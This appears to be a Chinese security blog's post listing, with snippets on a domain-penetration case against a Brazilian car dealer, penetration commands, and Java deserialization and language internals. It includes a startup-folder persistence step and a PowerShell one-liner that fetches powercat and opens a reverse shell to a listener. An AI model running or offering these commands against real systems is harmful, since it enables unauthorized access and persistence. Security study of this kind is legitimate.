域渗透实例
巴西某汽车销售商 入口: CVE-2017-12149 获得入口机 入口点持久化 向 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp 植入恶意bat,开机自动向我们的CS弹回shell(powershell) ...
记录渗透常用的指令(我常用的
Windows 反弹shell powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 ...
CC链1
CC链,逃不掉的。 CC链1的漏洞版本在apache commons collections 3.21以下 。分为两条,一个TransformerMap链一个LazyMap链 Transformer Map 链 RCE原理 我在网上找到了一则利用代码,虽然这个利用代...
java 代理
代理的作用,就是在原有类的代码不发生改动的情况下,添加新功能。起到一个修饰器的作用。 假设我们现在有个类,用于打印helloworld class hello{ public void gogo(){System.out.println("Hello Wrol...
JAVA JNI
JNI是JAVA的一个接口,用来实现c/c++调用,为JAVA提供了一个操纵底层的能力。 JNI HelloWorld java IDE:idea C IDE:vs2019 1.写好JAVA文件,定义好native方法。 public class test { static...
JAVA 类加载器
类加载器,即ClassLoader,用于加载JAVA类文件(.class)到JVM中 ClassLoader 在JVM类加载器中最顶层的是Bootstrap ClassLoader(引导类加载器)、Extension ClassLoader(扩展类加载器)、App ClassLoader(系...
JAVA URLDNS链
看到这篇文章我不禁陷入深思,我五月上来就搞这个链,真的是痛苦不堪。现在开始重拾JAVA反序列化,根据P神的文章,先来一条简单的链:URLDNS。 URLDNS 这个链的主要作用是,可以通过反序列化的手段,...
JAVA反射及其相关安全问题
反射的基础 反射是java的一个特性,用于获取类的详细信息(方法,变量),并可以执行类中的方法。 获得一个类的类对象 要获取类的详细信息或执行其中的方法,首先肯定是要获取到那个类的类对象 方法...
JAVA servlet&JSP
本文章部署平台:TOMCAT 10 Servlet Servlet生命周期 1.调用init()方法进行初始化 init()方法在第一次创建servlet时被调用,用于进行初始化操作。 public void init() throws ServletException{.....